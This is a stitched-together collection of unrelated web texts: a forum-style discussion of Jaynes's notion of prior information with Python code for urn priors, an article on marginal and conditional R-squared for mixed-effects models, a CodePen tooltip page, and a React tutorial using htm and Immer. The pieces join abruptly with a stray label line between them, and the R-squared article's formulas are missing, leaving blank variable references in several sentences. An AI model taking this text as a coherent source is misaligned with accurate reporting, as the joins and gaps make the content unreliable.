void close(optional [Clamp] unsigned short code, optional USVString reason);
// messaging
attribute EventHandler onmessage;
attribute BinaryType binaryType;
void send(USVString data);
void send(Blob data);
void send(ArrayBuffer data);
void send(ArrayBufferView data);
};
Each WebSocket object has an associated url (a URL record).
socket = new WebSocket(url [, protocols ] )
Creates a new WebSocket object, immediately establishing the associated WebSocket connection.
url is a string giving the URL over which the connection is established. Only "ws" or "wss" schemes are allowed; others will cause a "SyntaxError" DOMException. URLs with fragments will also cause such an exception.
protocols is either a string or an array of strings. If it is a string, it is equivalent to an array consisting of just that string; if it is omitted, it is equivalent to the empty array. Each string in the array is a subprotocol name. The connection will only be established if the server reports that it has selected one of these subprotocols. The subprotocol names have to match the requirements for elements that comprise the value of Sec-WebSocket-Protocol fields as defined by the WebSocket protocol specification. [WSP]
socket . send( data )
Transmits data using the WebSocket connection. data can be a string, a Blob, an ArrayBuffer, or an ArrayBufferView.
socket . close( [ code ] [, reason ] )
Closes the WebSocket connection, optionally using code as the the WebSocket connection close code and reason as the the WebSocket connection close reason.
socket . url
Returns the URL that was used to establish the WebSocket connection.
socket . readyState
Returns the state of the WebSocket object's connection. It can have the values described below.
socket . bufferedAmount
Returns the number of bytes of application data (UTF-8 text and binary data) that have been queued using send() but not yet been transmitted to the network.
If the WebSocket connection is closed, this attribute's value will only increase with each call to the send() method. (The number does not reset to zero once the connection closes.)
socket . extensions
Returns the extensions selected by the server, if any.
socket . protocol
Returns the subprotocol selected by the server, if any. It can be used in conjunction with the array form of the constructor's second argument to perform subprotocol negotiation.
socket . binaryType [ = value ]
Returns a string that indicates how binary data from the WebSocket object is exposed to scripts:
"blob"
Binary data is returned in Blob form.
"arraybuffer"
Binary data is returned in ArrayBuffer form.
Can be set, to change how binary data is returned. The default is "blob".
The WebSocket(url, protocols) constructor, when invoked, must run these steps:
1. Let urlRecord be the result of applying the URL parser to url.
2. If urlRecord is failure, then throw a "SyntaxError" DOMException.
3. If urlRecord's scheme is not "ws" or "wss", then throw a "SyntaxError" DOMException.
4. If urlRecord's fragment is non-null, then throw a "SyntaxError" DOMException.
5. If protocols is a string, set protocols to a sequence consisting of just that string.
6. If any of the values in protocols occur more than once or otherwise fail to match the requirements for elements that comprise the value of Sec-WebSocket-Protocol fields as defined by the WebSocket protocol specification, then throw a "SyntaxError" DOMException. [WSP]
7. Run this step in parallel:
1. Establish a WebSocket connection given urlRecord, protocols, and the entry settings object. [FETCH]
If the establish a WebSocket connection algorithm fails, it triggers the fail the WebSocket connection algorithm, which then invokes the close the WebSocket connection algorithm, which then establishes that the WebSocket connection is closed, which fires the close event as described below.
8. Return a new WebSocket object whose url is urlRecord.
The url attribute's getter must return this WebSocket object's url, serialized.
The readyState attribute represents the state of the connection. It can have the following values:
CONNECTING (numeric value 0)
The connection has not yet been established.
OPEN (numeric value 1)
The WebSocket connection is established and communication is possible.
CLOSING (numeric value 2)
The connection is going through the closing handshake, or the close() method has been invoked.
CLOSED (numeric value 3)
The connection has been closed or could not be opened.
When the object is created its readyState must be set to CONNECTING (0).
The extensions attribute must initially return the empty string. After the WebSocket connection is established, its value might change, as defined below.
The protocol attribute must initially return the empty string. After the WebSocket connection is established, its value might change, as defined below.
The close(code, reason) method, when invoked, must run these steps:
1. If code is present, but is neither an integer equal to 1000 nor an integer in the range 3000 to 4999, inclusive, throw an "InvalidAccessError" DOMException.
2. If reason is present, then run these substeps:
1. Let reasonBytes be the result of encoding reason.
2. If reasonBytes is longer than 123 bytes, then throw a "SyntaxError" DOMException.
3. Run the first matching steps from the following list:
If the readyState attribute is in the CLOSING (2) or CLOSED (3) state
Do nothing.
The connection is already closing or is already closed. If it has not already, a close event will eventually fire as described below.
If the WebSocket connection is not yet established [WSP]
Fail the WebSocket connection and set the readyState attribute's value to CLOSING (2). [WSP]
The fail the WebSocket connection algorithm invokes the close the WebSocket connection algorithm, which then establishes that the WebSocket connection is closed, which fires the close event as described below.
If the WebSocket closing handshake has not yet been started [WSP]
Start the WebSocket closing handshake and set the readyState attribute's value to CLOSING (2). [WSP]
If neither code nor reason is present, the WebSocket Close message must not have a body.
The WebSocket Protocol specification erroneously states that the status code is required for the start the WebSocket closing handshake algorithm.
If code is present, then the status code to use in the WebSocket Close message must be the integer given by close. [WSP]
If reason is also present, then reasonBytes must be provided in the Close message after the status code. [WSP]
The start the WebSocket closing handshake algorithm eventually invokes the close the WebSocket connection algorithm, which then establishes that the WebSocket connection is closed, which fires the close event as described below.
Otherwise
Set the readyState attribute's value to CLOSING (2).
The WebSocket closing handshake is started, and will eventually invoke the close the WebSocket connection algorithm, which will establish that the WebSocket connection is closed, and thus the close event will fire, as described below.
The close() method does not discard previously sent messages before starting the WebSocket closing handshake — even if, in practice, the user agent is still busy sending those messages, the handshake will only start after the messages are sent.
The bufferedAmount attribute must return the number of bytes of application data (UTF-8 text and binary data) that have been queued using send() but that, as of the last time the event loop reached step 1, had not yet been transmitted to the network. (This thus includes any text sent during the execution of the current task, regardless of whether the user agent is able to transmit text in the background in parallel with script execution.) This does not include framing overhead incurred by the protocol, or buffering done by the operating system or network hardware.
In this simple example, the bufferedAmount attribute is used to ensure that updates are sent either at the rate of one update every 50ms, if the network can handle that rate, or at whatever rate the network can handle, if that is too fast.
var socket = new WebSocket('ws://game.example.com:12010/updates');
socket.onopen = function () {
setInterval(function() {
if (socket.bufferedAmount == 0)
socket.send(getUpdateData());
}, 50);
};
The bufferedAmount attribute can also be used to saturate the network without sending the data at a higher rate than the network can handle, though this requires more careful monitoring of the value of the attribute over time.
When a WebSocket object is created, its binaryType IDL attribute must be set to the string "blob". On getting, it must return the last value it was set to. On setting, the user agent must set the IDL attribute to the new value.
User agents can use the binaryType attribute as a hint for how to handle incoming binary data: if the attribute is set to "blob", it is safe to spool it to disk, and if it is set to "arraybuffer", it is likely more efficient to keep the data in memory. Naturally, user agents are encouraged to use more subtle heuristics to decide whether to keep incoming data in memory or not, e.g. based on how big the data is or how common it is for a script to change the attribute at the last minute. This latter aspect is important in particular because it is quite possible for the attribute to be changed after the user agent has received the data but before the user agent has fired the event for it.
The send(data) method transmits data using the connection. If the readyState attribute is CONNECTING, it must throw an "InvalidStateError" DOMException. Otherwise, the user agent must run the appropriate set of steps from the following list:
If the argument is a string
If the WebSocket connection is established and the WebSocket closing handshake has not yet started, then the user agent must send a WebSocket Message comprised of the data argument using a text frame opcode; if the data cannot be sent, e.g. because it would need to be buffered but the buffer is full, the user agent must flag the WebSocket as full and then close the WebSocket connection. Any invocation of this method with a string argument that does not throw an exception must increase the bufferedAmount attribute by the number of bytes needed to express the argument as UTF-8. [UNICODE] [ENCODING] [WSP]
If the argument is a Blob object
If the WebSocket connection is established, and the WebSocket closing handshake has not yet started, then the user agent must send a WebSocket Message comprised of data using a binary frame opcode; if the data cannot be sent, e.g. because it would need to be buffered but the buffer is full, the user agent must flag the WebSocket as full and then close the WebSocket connection. The data to be sent is the raw data represented by the Blob object. Any invocation of this method with a Blob argument that does not throw an exception must increase the bufferedAmount attribute by the size of the Blob object's raw data, in bytes. [WSP] [FILEAPI]
If the argument is an ArrayBuffer object
If the WebSocket connection is established, and the WebSocket closing handshake has not yet started, then the user agent must send a WebSocket Message comprised of data using a binary frame opcode; if the data cannot be sent, e.g. because it would need to be buffered but the buffer is full, the user agent must flag the WebSocket as full and then close the WebSocket connection. The data to be sent is the data stored in the buffer described by the ArrayBuffer object. Any invocation of this method with an ArrayBuffer argument that does not throw an exception must increase the bufferedAmount attribute by the length of the ArrayBuffer in bytes. [WSP]
If the argument is an object that matches the ArrayBufferView type definition
If the WebSocket connection is established, and the WebSocket closing handshake has not yet started, then the user agent must send a WebSocket Message comprised of data using a binary frame opcode; if the data cannot be sent, e.g. because it would need to be buffered but the buffer is full, the user agent must flag the WebSocket as full and then close the WebSocket connection. The data to be sent is the data stored in the section of the buffer described by the ArrayBuffer object that data references. Any invocation of this method with this kind of argument that does not throw an exception must increase the bufferedAmount attribute by the length of data's buffer in bytes. [WSP]
The following are the event handlers (and their corresponding event handler event types) that must be supported, as event handler IDL attributes, by all objects implementing the WebSocket interface:
Event handler Event handler event type
onopen open
onmessage message
onerror error
onclose close
9.3.3 Feedback from the protocol
When the WebSocket connection is established, the user agent must queue a task to run these steps:
1. Change the readyState attribute's value to OPEN (1).
2. Change the extensions attribute's value to the extensions in use, if it is not the null value. [WSP]
3. Change the protocol attribute's value to the subprotocol in use, if it is not the null value. [WSP]
4. Fire an event named open at the WebSocket object.
Since the algorithm above is queued as a task, there is no race condition between the WebSocket connection being established and the script setting up an event listener for the open event.
When a WebSocket message has been received with type type and data data, the user agent must queue a task to follow these steps: [WSP]
1. If the readyState attribute's value is not OPEN (1), then return.
2. Let dataForEvent be determined by switching on type and binaryType:
type indicates that the data is Text
a new DOMString containing data
type indicates that the data is Binary and binaryType is "blob"
a new Blob object, created in the relevant Realm of the WebSocket object, that represents data as its raw data [FILEAPI]
type indicates that the data is Binary and binaryType is "arraybuffer"
a new ArrayBuffer object, created in the relevant Realm of the WebSocket object, whose contents are data
3. Fire an event named message at the WebSocket object, using MessageEvent, with the origin attribute initialized to the serialization of the WebSocket object's url's origin, and the data attribute initialized to dataForEvent.
User agents are encouraged to check if they can perform the above steps efficiently before they run the task, picking tasks from other task queues while they prepare the buffers if not. For example, if the binaryType attribute was set to "blob" when the data arrived, and the user agent spooled all the data to disk, but just before running the above task for this particular message the script switched binaryType to "arraybuffer", the user agent would want to page the data back to RAM before running this task so as to avoid stalling the main thread while it created the ArrayBuffer object.
Here is an example of how to define a handler for the message event in the case of text frames:
mysocket.onmessage = function (event) {
if (event.data == 'on') {
turnLampOn();
} else if (event.data == 'off') {
turnLampOff();
}
};
The protocol here is a trivial one, with the server just sending "on" or "off" messages.
When the WebSocket closing handshake is started, the user agent must queue a task to change the readyState attribute's value to CLOSING (2). (If the close() method was called, the readyState attribute's value will already be set to CLOSING (2) when this task runs.) [WSP]
When the WebSocket connection is closed, possibly cleanly, the user agent must queue a task to run the following substeps:
1. Change the readyState attribute's value to CLOSED (3).
2. If the user agent was required to fail the WebSocket connection, or if the the WebSocket connection was closed after being flagged as full, fire an event named error at the WebSocket object. [WSP]
3. Fire an event named close at the WebSocket object, using CloseEvent, with the wasClean attribute initialized to true if the connection closed cleanly and false otherwise, the code attribute initialized to the WebSocket connection close code, and the reason attribute initialized to the result of applying UTF-8 decode without BOM to the WebSocket connection close reason. [WSP]
User agents must not convey any failure information to scripts in a way that would allow a script to distinguish the following situations:
In all of these cases, the the WebSocket connection close code would be 1006, as required by the WebSocket Protocol specification. [WSP]
Allowing a script to distinguish these cases would allow a script to probe the user's local network in preparation for an attack.
In particular, this means the code 1015 is not used by the user agent (unless the server erroneously uses it in its close frame, of course).
The task source for all tasks queued in this section is the WebSocket task source.
9.3.4 Ping and Pong frames
The WebSocket protocol specification defines Ping and Pong frames that can be used for keep-alive, heart-beats, network status probing, latency instrumentation, and so forth. These are not currently exposed in the API.
User agents may send ping and unsolicited pong frames as desired, for example in an attempt to maintain local network NAT mappings, to detect failed connections, or to display latency metrics to the user. User agents must not use pings or unsolicited pongs to aid the server; it is assumed that servers will solicit pongs whenever appropriate for the server's needs.
9.3.5 The CloseEvent interface
WebSocket objects use the CloseEvent interface for their close events:
[Constructor(DOMString type, optional CloseEventInit eventInitDict), Exposed=(Window,Worker)]
interface CloseEvent : Event {
readonly attribute boolean wasClean;
readonly attribute unsigned short code;
readonly attribute USVString reason;
};
dictionary CloseEventInit : EventInit {
boolean wasClean = false;
unsigned short code = 0;
USVString reason = "";
};
event . wasClean
Returns true if the connection closed cleanly; false otherwise.
event . code
Returns the WebSocket connection close code provided by the server.
event . reason
Returns the WebSocket connection close reason provided by the server.
The wasClean attribute must return the value it was initialized to. It represents whether the connection closed cleanly or not.
The code attribute must return the value it was initialized to. It represents the WebSocket connection close code provided by the server.
The reason attribute must return the value it was initialized to. It represents the WebSocket connection close reason provided by the server.
9.3.6 Garbage collection
A WebSocket object whose readyState attribute's value was set to CONNECTING (0) as of the last time the event loop reached step 1 must not be garbage collected if there are any event listeners registered for open events, message events, error events, or close events.
A WebSocket object whose readyState attribute's value was set to OPEN (1) as of the last time the event loop reached step 1 must not be garbage collected if there are any event listeners registered for message events, error, or close events.
A WebSocket object whose readyState attribute's value was set to CLOSING (2) as of the last time the event loop reached step 1 must not be garbage collected if there are any event listeners registered for error or close events.
A WebSocket object with an established connection that has data queued to be transmitted to the network must not be garbage collected. [WSP]
If a WebSocket object is garbage collected while its connection is still open, the user agent must start the WebSocket closing handshake, with no status code for the Close message. [WSP]
If a user agent is to make disappear a WebSocket object (this happens when a Document object goes away), the user agent must follow the first appropriate set of steps from the following list:
If the WebSocket connection is not yet established [WSP]
Fail the WebSocket connection. [WSP]
If the WebSocket closing handshake has not yet been started [WSP]
Start the WebSocket closing handshake, with the status code to use in the WebSocket Close message being 1001. [WSP]
Otherwise
Do nothing.
|
__label__pos
| 0.867517 |
mp252 mp252 - 1 year ago 68
Python Question
Searching regex expression, to return string with spaces
I am trying to search a string in python using regex for a particular word that begins with a space and ends with a space after it. The string in question that I want to search is;
JAKARTA, INDONESIA (1 February 2017)
and I want to get back the
", INDONESIA ("
part so I can apply
rtrim
and
ltrim
to it. As I could also be returning United Kingdom.
I have attempted to write this code within my python code;
import re
text = "JAKARTA, INDONESIA (1 February 2017)"
countryRegex = re.compile(r'^(,)(\s)([a-zA-Z]+)(\s)(\()$')
mo = countryRegex.search(text)
print(mo.group())
However this prints out the result
AttributeError: 'NoneType' object has no attribute 'group'
Indicated to me that I am not returning any matched objects.
I then attempted to use my regex in regex 101 however it still returns an error here saying "Your regular expression does not match the subject string."
I assumed this would work as I test for literal comma (
,
) then a space (
\s
), then one or more letters (
[a-zA-Z]+
), then another space (
\s
) and then finally an opening bracket making sure I have escaped it (
\(
). Is there something wrong with my regex?
Answer Source
Once you remove the anchors (^ matches the start of string position and $ matches the end of string position), the regex will match the string. However, you may get INDONESIA with a capturing group using:
,\s*([a-zA-Z]+)\s*\(
See the regex demo. match.group(1) will contain the value.
Details:
• ,\s* - a comma and zero or more whitespaces (replace * with + if you want at least 1 whitespace to be present)
• ([a-zA-Z]+) - capturing group 1 matching one or more ASCII letters
• \s* - zero or more whitespaces
• \( - a ( literal symbol.
Sample Python code:
import re
text = "JAKARTA, INDONESIA (1 February 2017)"
countryRegex = re.compile(r',\s*([a-zA-Z]+)\s*\(')
mo = countryRegex.search(text)
if mo:
print(mo.group(1))
An alternative regex that would capture anything between ,+whitespace and whitespace+( is
,\s*([^)]+?)\s*\(
See this regex demo. Here, [^)]+? matches 1+ chars other than ) as few as possible.
Recommended from our users: Dynamic Network Monitoring from WhatsUp Gold from IPSwitch. Free Download
|
__label__pos
| 0.870654 |
blob: 0a287c4dc4d83439cfc4a006aa23b13f61b489b6 [file] [log] [blame]
/*
* This file is part of the coreboot project.
*
* Copyright (C) 2011 The Chromium OS Authors. All rights reserved.
* Copyright (C) 2013 Sage Electronic Engineering, LLC.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; version 2 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*/
#include <stdint.h>
#include <string.h>
#include <arch/io.h>
#include "soc.h"
#include "gpio.h"
#define MAX_GPIO_NUMBER 31 /* zero based */
void setup_soc_gpios(const struct soc_gpio_map *gpio)
{
u16 gpiobase = pci_read_config16(SOC_LPC_DEV, GBASE) & ~0xf;
u32 *cfiobase = (u32 *)(pci_read_config32(SOC_LPC_DEV, IOBASE) & ~0xf);
u32 cfio_cnt = 0;
/* GPIO */
if (gpio->core.level)
outl(*((u32*)gpio->core.level), gpiobase + GPIO_SC_GP_LVL);
if (gpio->core.mode)
outl(*((u32*)gpio->core.mode), gpiobase + GPIO_SC_USE_SEL);
if (gpio->core.direction)
outl(*((u32*)gpio->core.direction), gpiobase + GPIO_SC_IO_SEL);
if (gpio->core.tpe)
outl(*((u32*)gpio->core.tpe), gpiobase + GPIO_SC_TPE);
if (gpio->core.tne)
outl(*((u32*)gpio->core.tne), gpiobase + GPIO_SC_TNE);
if (gpio->core.ts)
outl(*((u32*)gpio->core.ts), gpiobase + GPIO_SC_TS);
/* GPIO SUS Well Set 1 */
if (gpio->sus.level)
outl(*((u32*)gpio->sus.level), gpiobase + GPIO_SUS_GP_LVL);
if (gpio->sus.mode)
outl(*((u32*)gpio->sus.mode), gpiobase + GPIO_SUS_USE_SEL);
if (gpio->sus.direction)
outl(*((u32*)gpio->sus.direction), gpiobase + GPIO_SUS_IO_SEL);
if (gpio->sus.tpe)
outl(*((u32*)gpio->sus.tpe), gpiobase + GPIO_SUS_TPE);
if (gpio->sus.tne)
outl(*((u32*)gpio->sus.tne), gpiobase + GPIO_SUS_TNE);
if (gpio->sus.ts)
outl(*((u32*)gpio->sus.ts), gpiobase + GPIO_SUS_TS);
if (gpio->sus.we)
outl(*((u32*)gpio->sus.we), gpiobase + GPIO_SUS_WE);
/* GPIO PAD Settings */
/* CFIO Core Well Set 1 */
if ((gpio->core.cfio_init != NULL) && (gpio->core.cfio_entrynum != 0)) {
write32(cfiobase + (0x0700 / sizeof(u32)), (u32)0x01001002);
for (cfio_cnt = 0; cfio_cnt < gpio->core.cfio_entrynum; cfio_cnt++) {
if (!((u32)gpio->core.cfio_init[cfio_cnt].pad_conf_0))
continue;
write32(cfiobase + ((CFIO_PAD_CONF0 + (16*cfio_cnt))/sizeof(u32)), (u32)gpio->core.cfio_init[cfio_cnt].pad_conf_0);
write32(cfiobase + ((CFIO_PAD_CONF1 + (16*cfio_cnt))/sizeof(u32)), (u32)gpio->core.cfio_init[cfio_cnt].pad_conf_1);
write32(cfiobase + ((CFIO_PAD_VAL + (16*cfio_cnt))/sizeof(u32)), (u32)gpio->core.cfio_init[cfio_cnt].pad_val);
write32(cfiobase + ((CFIO_PAD_DFT + (16*cfio_cnt))/sizeof(u32)), (u32)gpio->core.cfio_init[cfio_cnt].pad_dft);
}
write32(cfiobase + (0x0700 / sizeof(u32)), (u32)0x01041002);
}
/* CFIO SUS Well Set 1 */
if ((gpio->sus.cfio_init != NULL) && (gpio->sus.cfio_entrynum != 0)) {
write32(cfiobase + (0x1700 / sizeof(u32)), (u32)0x01001002);
for (cfio_cnt = 0; cfio_cnt < gpio->sus.cfio_entrynum; cfio_cnt++) {
if (!((u32)gpio->sus.cfio_init[cfio_cnt].pad_conf_0))
continue;
write32(cfiobase + ((CFIO_PAD_CONF0 + 0x1000 + (16*cfio_cnt))/sizeof(u32)), (u32)gpio->sus.cfio_init[cfio_cnt].pad_conf_0);
write32(cfiobase + ((CFIO_PAD_CONF1 + 0x1000 + (16*cfio_cnt))/sizeof(u32)), (u32)gpio->sus.cfio_init[cfio_cnt].pad_conf_1);
write32(cfiobase + ((CFIO_PAD_VAL + 0x1000 + (16*cfio_cnt))/sizeof(u32)), (u32)gpio->sus.cfio_init[cfio_cnt].pad_val);
write32(cfiobase + ((CFIO_PAD_DFT + 0x1000 + (16*cfio_cnt))/sizeof(u32)), (u32)gpio->sus.cfio_init[cfio_cnt].pad_dft);
}
write32(cfiobase + (0x1700 / sizeof(u32)), (u32)0x01041002);
}
}
int get_gpio(int gpio_num)
{
u16 gpio_base = pci_read_config16(SOC_LPC_DEV, GBASE) & ~0xf;
int bit;
if (gpio_num > MAX_GPIO_NUMBER)
return 0; /* Ignore wrong GPIO numbers. */
bit = gpio_num % 32;
return (inl(gpio_base + GPIO_SC_USE_SEL) >> bit) & 1;
}
|
__label__pos
| 0.886683 |
2
votes
1answer
160 views
Why is “Options Includes Indexes” Enabled by Default in Apache?
I was curious as to why Options Includes Indexes is generally enabled by default in Apache configurations. Anyone know why this is, as it's generally frowned upon for security reasons?
1
vote
2answers
46 views
Remove server and system name from apache auto indexes
I've configured apache2 to display folder content with option Indexes in one of my locations, but I really dislike how apache brags about its version and system's version. How do I remove this ...
|
__label__pos
| 0.997022 |
Followup to: "Inductive Bias"
What exactly is a "prior", as a mathematical object? Suppose you're looking at an urn filled with red and white balls. When you draw the very first ball, you haven't yet had a chance to gather much evidence, so you start out with a rather vague and fuzzy expectation of what might happen - you might say "fifty/fifty, even odds" for the chance of getting a red or white ball. But you're ready to revise that estimate for future balls as soon as you've drawn a few samples. So then this initial probability estimate, 0.5, is not repeat not a "prior".
An introduction to Bayes's Rule for confused students might refer to the population frequency of breast cancer as the "prior probability of breast cancer", and the revised probability after a mammography as the "posterior probability". But in the scriptures of Deep Bayesianism, such as Probability Theory: The Logic of Science, one finds a quite different concept - that of prior information, which includes e.g. our beliefs about the sensitivity and specificity of mammography exams. Our belief about the population frequency of breast cancer is only one small element of our prior information.
In my earlier post on inductive bias, I discussed three possible beliefs we might have about an urn of red and white balls, which will be sampled without replacement:
• Case 1: The urn contains 5 red balls and 5 white balls;
• Case 2: A random number was generated between 0 and 1, and each ball was selected to be red (or white) at this probability;
• Case 3: A monkey threw balls into the urn, each with a 50% chance of being red or white.
In each case, if you ask me - before I draw any balls - to estimate my marginal probability that the fourth ball drawn will be red, I will respond "50%". And yet, once I begin observing balls drawn from the urn, I reason from the evidence in three different ways:
• Case 1: Each red ball drawn makes it less likely that future balls will be red, because I believe there are fewer red balls left in the urn.
• Case 2: Each red ball drawn makes it more plausible that future balls will be red, because I will reason that the random number was probably higher, and that the urn is hence more likely to contain mostly red balls.
• Case 3: Observing a red or white ball has no effect on my future estimates, because each ball was independently selected to be red or white at a fixed, known probability.
Suppose I write a Python program to reproduce my reasoning in each of these scenarios. The program will take in a record of balls observed so far, and output an estimate of the probability that the next ball drawn will be red. It turns out that the only necessary information is the count of red balls seen and white balls seen, which we will respectively call R and W. So each program accepts inputs R and W, and outputs the probability that the next ball drawn is red:
• Case 1: return (5 - R)/(10 - R - W) # Number of red balls remaining / total balls remaining
• Case 2: return (R + 1)/(R + W + 2) # Laplace's Law of Succession
• Case 3: return 0.5
These programs are correct so far as they go. But unfortunately, probability theory does not operate on Python programs. Probability theory is an algebra of uncertainty, a calculus of credibility, and Python programs are not allowed in the formulas. It is like trying to add 3 to a toaster oven.
To use these programs in the probability calculus, we must figure out how to convert a Python program into a more convenient mathematical object - say, a probability distribution.
Suppose I want to know the combined probability that the sequence observed will be RWWRR, according to program 2 above. Program 2 does not have a direct faculty for returning the joint or combined probability of a sequence, but it is easy to extract anyway. First, I ask what probability program 2 assigns to observing R, given that no balls have been observed. Program 2 replies "1/2". Then I ask the probability that the next ball is R, given that one red ball has been observed; program 2 replies "2/3". The second ball is actually white, so the joint probability so far is 1/2 * 1/3 = 1/6. Next I ask for the probability that the third ball is red, given that the previous observation is RW; this is summarized as "one red and one white ball", and the answer is 1/2. The third ball is white, so the joint probability for RWW is 1/12. For the fourth ball, given the previous observation RWW, the probability of redness is 2/5, and the joint probability goes to 1/30. We can write this as p(RWWR|RWW) = 2/5, which means that if the sequence so far is RWW, the probability assigned by program 2 to the sequence continuing with R and forming RWWR equals 2/5. And then p(RWWRR|RWWR) = 1/2, and the combined probability is 1/60.
We can do this with every possible sequence of ten balls, and end up with a table of 1024 entries. This table of 1024 entries constitutes a probability distribution over sequences of observations of length 10, and it says everything the Python program had to say (about 10 or fewer observations, anyway). Suppose I have only this probability table, and I want to know the probability that the third ball is red, given that the first two balls drawn were white. I need only sum over the probability of all entries beginning with WWR, and divide by the probability of all entries beginning with WW.
We have thus transformed a program that computes the probability of future events given past experiences, into a probability distribution over sequences of observations.
You wouldn't want to do this in real life, because the Python program is ever so much more compact than a table with 1024 entries. The point is not that we can turn an efficient and compact computer program into a bigger and less efficient giant lookup table; the point is that we can view an inductive learner as a mathematical object, a distribution over sequences, which readily fits into standard probability calculus. We can take a computer program that reasons from experience and think about it using probability theory.
Why might this be convenient? Say that I'm not sure which of these three scenarios best describes the urn - I think it's about equally likely that each of the three cases holds true. How should I reason from my actual observations of the urn? If you think about the problem from the perspective of constructing a computer program that imitates my inferences, it looks complicated - we have to juggle the relative probabilities of each hypothesis, and also the probabilities within each hypothesis. If you think about it from the perspective of probability theory, the obvious thing to do is to add up all three distributions with weightings of 1/3 apiece, yielding a new distribution (which is in fact correct). Then the task is just to turn this new distribution into a computer program, which turns out not to be difficult.
So that is what a prior really is - a mathematical object that represents all of your starting information plus the way you learn from experience.
48
19 comments, sorted by Highlighting new comments since Today at 10:53 AM
New Comment
I'm confused when you say that the prior represents all your starting information plus the way you learn from experience. Isn't the way you learn from experience fixed, in this framework? Given that you are using Bayesian methods, so that the idea of a prior is well defined, then doesn't that already tell how you will learn from experience?
Hal, with a poor prior, "Bayesian updating" can lead to learning in the wrong direction or to no learning at all. Bayesian updating guarantees a certain kind of consistency, but not correctness. (If you have five city maps that agree with each other, they might still disagree with the city.) You might think of Bayesian updating as a kind of lower level of organization - like a computer chip that runs programs, or the laws of physics that run the computer chip - underneath the activity of learning. If you start with a maxentropy prior that assigns equal probability to every sequence of observations, and carry out strict Bayesian updating, you'll still never learn anything; your marginal probabilities will never change as a result of the Bayesian updates. Conversely, if you somehow had a good prior but no Bayesian engine to update it, you would stay frozen in time and no learning would take place. To learn you need a good prior and an updating engine. Taking a picture requires a camera, light - and also time.
This probably deserves its own post.
Another thing I don't fully understand is the process of "updating" a prior. I've seen different flavors of Bayesian reasoning described. In some, we start with a prior, get some information and update the probabilities. This new probability distribution now serves as our prior for interpreting the next incoming piece of information, which then causes us to further update the prior. In other interpretations, the priors never change; they are always considered the initial probability distribution. We then use those prior probabilities plus our sequence of observations since then to make new interpretations and predictions. I gather that these can be considered mathematically identical, but do you think one or the other is a more useful or helpful way to think of it?
In this example, you start off with uncertainty about which process put in the balls, so we give 1/3 probability to each. But then as we observe balls coming out, we can update this prior. Once we see 6 red balls for example, we can completely eliminate Case 1 which put in 5 red and 5 white. We can think of our prior as our information about the ball-filling process plus the current state of the urn, and this can be updated after each ball is drawn.
Hal,
You are being a bad boy. In his earlier discussion Eliezer made it clear that he did not approve of this terminology of "updating priors." One has posterior probability distributions. The prior is what one starts with. However, Eliezer has also been a bit confusing with his occasional use of such language as a "prior learning." I repeat, agents learn, not priors, although in his view of the post-human computerized future, maybe it will be computerized priors that do the learning.
The only way one is going to get "wrong learning" at least somewhat asymptotically is if the dimensionality is high and the support is disconnected. Eliezer is right that if one starts off with a prior that is far enough off, one might well have "wrong learning," at least for awhile. But, unless the conditions I just listed hold, eventually the learning will move in the right direction and head towards the correct answer, or probability distribution, at least that is what Bayes' Theorem asserts.
OTOH, the reference to "deep Bayesianism" raises another issue, that of fundamental subjectivism. There is this deep divide among Bayesians between the ones that are ultimately classical frequentists but who argue that Bayesian methods are a superior way of getting to the true objective distribution, and the deep subjectivist Bayesians. For the latter, there are no ultimately "true" probability distributions. We are always estimating something derived out of our subjective priors as updated by more recent information, wherever those priors came from.
Also, saying a prior should the known probability distribution, say of cancer victims, assumes that this probability is somehow known. The prior is always subject to how much information the assumer of a prior has when they being their process of estimation.
[-][anonymous]10y 0
Eliezer may not approve of it, but almost all of the literature uses the phrase "updating a prior" to mean exactly the type of sequential learning from evidence that Eliezer discusses. I prefer to think of it as 'updating a prior'. Bayes' theorem tells you that data is an operator on the space of probability distributions, converting prior information into posterior information. I think it's helpful to think of that process as 'updating' so that my prior actually changes to something new before the next piece of information comes my way.
Eliezer ,
Just to be clear . . . going back to your first paragraph, that 0.5 is a prior probability for the outcome of one draw from the urn (that is, for the random variable that equals 1 if the ball is red and 0 if the ball is white). But, as you point out, 0.5 is not a prior probability for the series of ten draws. What you're calling a "prior" would typically be called a "model" by statisticians. Bayesians traditionally divide a model into likelihood, prior, and hyperprior, but as you implicitly point out, the dividing line between these is not clear: ultimately, they're all part of the big model.
Barkley, I think you may be regarding likelihood distributions as fixed properties held in common by all agents, whereas I am regarding them as variables folded into the prior - if you have a probability distribution over sequences of observables, it implicitly includes beliefs about parameters and likelihoods. Where agents disagree about prior likelihood functions, not just prior parameter probabilities, their beliefs may trivially fail to converge.
Andrew's point may be particularly relevant here - it may indeed be that statisticians call what I am talking about a "model". (Although in some cases, like the Laplace's Law of Succession inductor, I think they might call it a "model class"?) Jaynes, however, would have called it our "prior information" and he would have written "the probability of A, given that we observe B" as p(A|B,I) where I stands for all our prior beliefs including parameter distributions and likelihood distributions. While we may often want to discriminate between different models and model classes, it makes no sense to talk about discriminating between "prior informations" - your prior information is everything you start out with.
Eliezer, I am very interested in the Bayesian approach to reasoning you've outlined on this site, it's one of the more elegant ideas I've ever run into.
I am a bit confused, though, about to what extent you are using math directly when assessing truth claims. If I asked you for example "what probability do you assign to the proposition 'global warming is anthropogenic' ?" (say), would you tell me a number?
Or is this mostly about conceptually understanding that P(effect|~cause) needs to be taken into account?
If it's a number, what's your heuristic for getting there (i.e., deciding on a prior probability & all the other probabilities)?
If there's a post that goes into that much detail, I haven't seen it yet, though your explanations of Bayes theorem generally are brilliant.
My reason for writing this is not to correct Eliezer. Rather, I want to expand on his distinction between prior information and prior probability. Pages 87-89 of Probability Theory: the Logic of Science by E. T. Jaynes (2004 reprint with corrections, ISBN 0 521 59271 2) is dense with important definitions and principles. The quotes below are from there, unless otherwise indicated.
Jaynes writes the fundamental law of inference as
P(H|DX) = P(H|X) P(D|HX) / P(D|X) (4.3)
Which the reader may be more used to seeing as
P(H|D) = P(H) P(D|H) / P(D)
Where
H = some hypothesis to be tested
D = the data under immediate consideration
X = all other information known
